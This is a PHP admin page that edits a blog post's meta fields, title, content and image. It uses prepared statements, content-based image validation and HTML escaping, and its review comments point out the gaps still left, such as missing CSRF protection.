
name : edit_blogs.php
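<?php
/**
 * Admin handler for editing one row of the `blogs` table.
 *
 * On a POST carrying `slid_update`, writes the meta fields, title and content
 * (plus a new image path when a valid image is uploaded) to the row whose
 * `prj_id` equals the `edit_sli` request parameter. The resulting alert markup
 * is stored in $Msg.
 *
 * $con, isImage(), showSuccessAlert() and showErrorAlert() are not defined in
 * this file; presumably they come from the two includes below.
 */
session_start();
include('../include/dbconnect.php');
// NOTE(review): presumably this include stops unauthenticated requests; confirm
// that it exits after redirecting, otherwise the handler below still runs.
include('include/sessioncheck.php');
$Msg="";
// NOTE(review): this state-changing POST is not protected by a CSRF token. Adding
// one needs a matching hidden field in the form, so it is not done here.
if (isset($_POST["slid_update"])) {
    // Read a request value as a string; array-shaped input (name[]=x) becomes ''.
    $asString = static function ($value): string {
        return is_scalar($value) ? (string) $value : '';
    };

    // Values are bound as statement parameters below, so they are taken raw:
    // escaping them first would store doubled backslashes.
    $mTitle    = $asString($_POST["mTitle"] ?? '');
    $mDesc     = $asString($_POST["mDesc"] ?? '');
    $mKey      = $asString($_POST["mKey"] ?? '');
    $s_title   = $asString($_POST["title"] ?? '');
    $s_content = $asString($_POST["service_content"] ?? '');
    // The original concatenated this value into the SQL text unescaped.
    // NOTE(review): prj_id looks like a numeric key; if so, also reject non-digit values.
    $blogId    = $asString($_REQUEST["edit_sli"] ?? '');

    $s_img = null;       // relative path of a newly stored image, if any
    $imageError = '';    // non-empty when an upload was attempted and rejected

    if (!empty($_FILES["s_img"]["name"])) {
        // The extension is chosen from this allow-list based on the file's real
        // content. The client-supplied MIME type and file name are never trusted,
        // because together they let any file (e.g. a .php script) be written
        // under the web root.
        $allowedTypes = [
            IMAGETYPE_JPEG => 'jpg',
            IMAGETYPE_PNG  => 'png',
            IMAGETYPE_GIF  => 'gif',
            IMAGETYPE_WEBP => 'webp',
        ];
        $tmpPath = $_FILES["s_img"]["tmp_name"] ?? '';
        $uploadOk = is_string($tmpPath)
            && ($_FILES["s_img"]["error"] ?? UPLOAD_ERR_NO_FILE) === UPLOAD_ERR_OK
            && is_uploaded_file($tmpPath);
        $imageInfo = $uploadOk ? getimagesize($tmpPath) : false;

        // isImage() is still consulted, but with the detected MIME type rather
        // than the one the browser claimed.
        if (is_array($imageInfo) && isset($allowedTypes[$imageInfo[2]]) && isImage($imageInfo['mime'])) {
            $candidate = "images/blogs/"."wp".uniqid().".".$allowedTypes[$imageInfo[2]];
            if (move_uploaded_file($tmpPath, "../".$candidate)) {
                $s_img = $candidate;
            } else {
                // Do not record a path for a file that was never stored.
                $imageError = 'Image Upload Failed';
            }
        } else {
            $imageError = 'Please Upload a Valid Image';
        }
    }

    // One parameterised UPDATE; prj_img is only touched when a new image was stored.
    $update_slider_sql = "UPDATE blogs SET mTitle=?, mDesc=?, mKey=?, prj_title=?, prj_content=?";
    $types = "sssss";
    $params = [$mTitle, $mDesc, $mKey, $s_title, $s_content];
    if ($s_img !== null) {
        $update_slider_sql .= ", prj_img=?";
        $types .= "s";
        $params[] = $s_img;
    }
    $update_slider_sql .= " WHERE prj_id=?";
    $types .= "s";
    $params[] = $blogId;

    $stmt = mysqli_prepare($con, $update_slider_sql);
    if ($stmt === false) {
        die('Update Failed');
    }
    mysqli_stmt_bind_param($stmt, $types, ...$params);
    if (!mysqli_stmt_execute($stmt)) {
        die('Update Failed');
    }
    mysqli_stmt_close($stmt);

    // Text fields are saved even when the image was rejected (as before), but the
    // image error is no longer overwritten by the success message.
    if ($imageError !== '') {
        $Msg = showErrorAlert($imageError, $con);
    } else {
        $Msg = showSuccessAlert('Blogs Updated Successfully', $con);
    }
}
?>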
<!DOCTYPE html>
<html lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <!-- Meta, title, CSS, favicons, etc. -->
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title><?php echo TITLE; ?></title>
      <!-- Bootstrap -->
      <link href="css/bootstrap.min.css" rel="stylesheet">
      <link rel="stylesheet" type="text/css" href="css/bootstrap-fileupload.css">
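      <!-- Font Awesome: the CDN copy is fetched over HTTPS so it cannot be altered in transit; consider adding an integrity attribute -->
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">
      <link href="css/font-awesome.min.css" rel="stylesheet">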
      <!-- Custom Theme Style -->
      <link href="css/custom.min.css" rel="stylesheet">
        <script src="js/jquery.js"></script>
   </head>
   <body class="nav-md">
      <div class="container body">
         <div class="main_container">
            <div class="col-md-3 left_col">
               <div class="left_col scroll-view">
              
                  <?php include('include/sidebar.php'); ?>
                  <!-- /menu footer buttons -->
                  <div class="sidebar-footer hidden-small">
                     <a data-toggle="tooltip" data-placement="top" title="Settings">
                     <span class="glyphicon glyphicon-cog" aria-hidden="true"></span>
                     </a>
                     <a data-toggle="tooltip" data-placement="top" title="FullScreen">
                     <span class="glyphicon glyphicon-fullscreen" aria-hidden="true"></span>
                     </a>
                     <a data-toggle="tooltip" data-placement="top" title="Lock">
                     <span class="glyphicon glyphicon-eye-close" aria-hidden="true"></span>
                     </a>
                     <a data-toggle="tooltip" data-placement="top" title="Logout">
                     <span class="glyphicon glyphicon-off" aria-hidden="true"></span>
                     </a>
                  </div>
                  <!-- /menu footer buttons -->
               </div>
            </div>
            <!-- top navigation -->
            <?php include('include/header.php'); ?>
            <!-- /top navigation -->
            <!-- page content -->
            <div class="right_col" role="main">
               <div class="">
                  <div class="clearfix"></div>
                  <div class="row">
                     <div class="col-md-12 col-sm-12 col-xs-12">
                        <div class="x_panel">
                           <div class="x_title">
                              <h2> Blog Details<!--<small>different form elements</small>--></h2>
                              <ul class="nav navbar-right panel_toolbox">
                                <li><a href="blogs.php" class="btn btn-success" style="color:#fff;">Go Back</a>
                                 </li>
                                 <li><a class="collapse-link"><i class="fa fa-chevron-up"></i></a>
                                 </li>
                                 <li><a class="close-link"><i class="fa fa-close"></i></a>
                                 </li>
                              </ul>
                              <div class="clearfix"></div>
                           </div>
                           <div class="x_content">
                              <br />
                              <form method="post" enctype="multipart/form-data" class="form-horizontal form-label-left">
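                              <?php
                                // Load the blog row being edited so the form can be pre-filled.
                                // edit_sli comes straight from the request, so it is escaped before it is
                                // placed inside the quoted SQL literal. A prepared statement is not used
                                // here because reading SELECT * through one needs mysqli_stmt_get_result(),
                                // which is only available with the mysqlnd driver.
                                // NOTE(review): escaping is only reliable if the connection charset was set
                                // with mysqli_set_charset() in dbconnect.php; confirm.
                                $requested_id = $_REQUEST["edit_sli"] ?? '';
                                $requested_id = is_scalar($requested_id) ? (string) $requested_id : '';
                                $dis_slider_sql = "SELECT * FROM blogs WHERE prj_id='" . mysqli_real_escape_string($con, $requested_id) . "'";
                                $dis_slider_exe = mysqli_query($con, $dis_slider_sql);

                                // A failed query or an unknown id yields an empty form, not PHP notices.
                                $dis_slider_result = $dis_slider_exe ? mysqli_fetch_array($dis_slider_exe) : null;
                                if (!is_array($dis_slider_result)) {
                                    $dis_slider_result = [
                                        "mTitle" => "",
                                        "mDesc" => "",
                                        "mKey" => "",
                                        "prj_title" => "",
                                        "prj_content" => "",
                                        "prj_img" => "",
                                    ];
                                }
                              ?>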
						           <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Meta Title <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
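                                       <input type="text" name="mTitle" value="<?php /* stored value: escape for the HTML attribute context */ echo htmlspecialchars((string) $dis_slider_result["mTitle"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" class="form-control col-md-7 col-xs-12" required>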
                                    </div>
                                 </div>
                                  <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Meta Description <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
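                                       <input type="text" name="mDesc" value="<?php /* stored value: escape for the HTML attribute context */ echo htmlspecialchars((string) $dis_slider_result["mDesc"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" class="form-control col-md-7 col-xs-12" required>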
                                    </div>
                                 </div>
                                  <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Meta Keywords <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
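                                       <input type="text" name="mKey" value="<?php /* stored value: escape for the HTML attribute context */ echo htmlspecialchars((string) $dis_slider_result["mKey"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" class="form-control col-md-7 col-xs-12" required>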
                                    </div>
                                 </div>
                                 
                                  <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Title <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
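                                       <input type="text" name="title" value="<?php /* stored value: escape for the HTML attribute context */ echo htmlspecialchars((string) $dis_slider_result["prj_title"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" class="form-control col-md-7 col-xs-12" required>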
                                    </div>
                                 </div>
                                <div class="form-group">
								  <div class="col-md-12">
									<label class="col-md-3 control-label">Content <span class="required">*</span></label>
									<div class="col-md-9">
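										<textarea class="form-control ckeditor" name="service_content" rows="6" required><?php /* escape so stored markup (e.g. a closing textarea tag) cannot break out of the element; the browser decodes the entities back into the field value */ echo htmlspecialchars((string) $dis_slider_result["prj_content"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></textarea>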
									</div>
								  </div>
							   </div>
                               <div class="form-group">
                                <label class="col-md-3 control-label">Image <span class="required">*</span></label>
                                <div class="col-md-8">
                                    <div class="fileupload fileupload-new" data-provides="fileupload">
                                        <div class="fileupload-new thumbnail" style="width: 200px; height: 150px;">
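                                            <img src="<?php /* stored path: escape for the HTML attribute context */ echo htmlspecialchars("../".$dis_slider_result["prj_img"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" alt="" style="height:270px; width:370px;"/>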
                                        </div>
                                        <div class="fileupload-preview fileupload-exists thumbnail" style="max-width: 200px; max-height: 150px; line-height: 20px;"></div>
                                        <div>
                                            <span class="btn btn-white btn-file">
                                                <span class="fileupload-new"><i class="fa fa-paper-clip"></i> Select image</span>
                                                <span class="fileupload-exists"><i class="fa fa-undo"></i> Change</span>
                                                <input type="file" name="s_img" accept="image/*" class="default" />
                                            </span>
                                            <a href="#" class="btn btn-danger fileupload-exists" data-dismiss="fileupload"><i class="fa fa-trash"></i> Remove</a>
                                        </div>
                                    </div>
                                    <!--<span class="label label-danger">NOTE!</span>&nbsp;
                                    <span></span>-->
                                </div>
                              </div>     
                                 <div class="ln_solid"></div>
                                 <div class="form-group">
                                    <div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3">
                                       <button type="submit" class="btn btn-primary">Cancel</button>
                                       <button type="submit" name="slid_update" class="btn btn-success">Update</button>
                                    </div>
                                 </div>
                              </form>
                           </div>
                        </div>
                     </div>
                  </div>
           <?php include('include/footer.php'); ?>
         </div>
      </div>
      <!-- jQuery -->
    
        <script src="js/jquery.min.js"></script>
       <script src="js/bootstrap.min.js"></script>
      <script src="validate/parsley.min.js"></script>
       <script src="js/jquery.js"></script>
      <script src="js/jquery-1.8.3.min.js"></script>
      <!-- Bootstrap -->
      <script type="text/javascript" src="js/bootstrap-fileupload.js"></script>
      <script src="js/bootstrap.min.js"></script>
       <script type="text/javascript" src="js/ckeditor/ckeditor.js"></script>
      <script src="js/moment.min.js"></script>
      <script src="js/daterangepicker.js"></script>
      <!-- Custom Theme Scripts -->
      <script src="js/custom.min.js"></script>
   </body>
</html>
